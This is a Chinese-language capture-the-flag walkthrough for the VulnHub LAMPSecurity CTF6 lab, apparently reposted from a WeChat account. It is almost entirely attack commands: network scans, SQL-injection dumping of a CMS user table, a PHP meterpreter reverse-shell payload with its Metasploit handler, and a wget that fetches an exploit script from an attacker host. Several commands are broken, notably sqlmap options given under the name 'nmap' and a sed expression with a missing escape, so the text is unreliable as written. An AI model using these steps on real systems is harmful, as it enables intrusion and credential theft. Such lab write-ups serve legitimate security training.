描述
LAMPSecurity 项目致力于生产可用于教育信息安全专业人员和测试产品的培训和基准测试工具。请注意,还有其他夺旗练习(不仅仅是最新的)。检查 SourceForge 站点以查找其他可用的练习
netdiscover -r eth0 -i 192.168.1.0/24
nmap -sV -sC -p- -oN /CTF/vulnhub/ctf6/nmap 192.168.1.113
按照个人习惯 首先从80(http)入手,能不能找到切入点,现在使用浏览器导航到web页面。
nmap -u "http://192.168.1.113/?id=4" --dbs --batch
nmap -u "http://192.168.1.113/?id=4" -D cms --tables --batch
nmap -u "http://192.168.1.113/?id=4" -D cms -T user --dump --batch
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.114 lport=4444
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.114
set lport 4444
wget http://192.168.0.104:8000/8478.sh
sed -i -e 's/r$//' 8478.sh
cat /proc/net/netlink
原文始发于微信公众号(剑客江湖):vulnhub-LAMPSecurity:CTF6
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论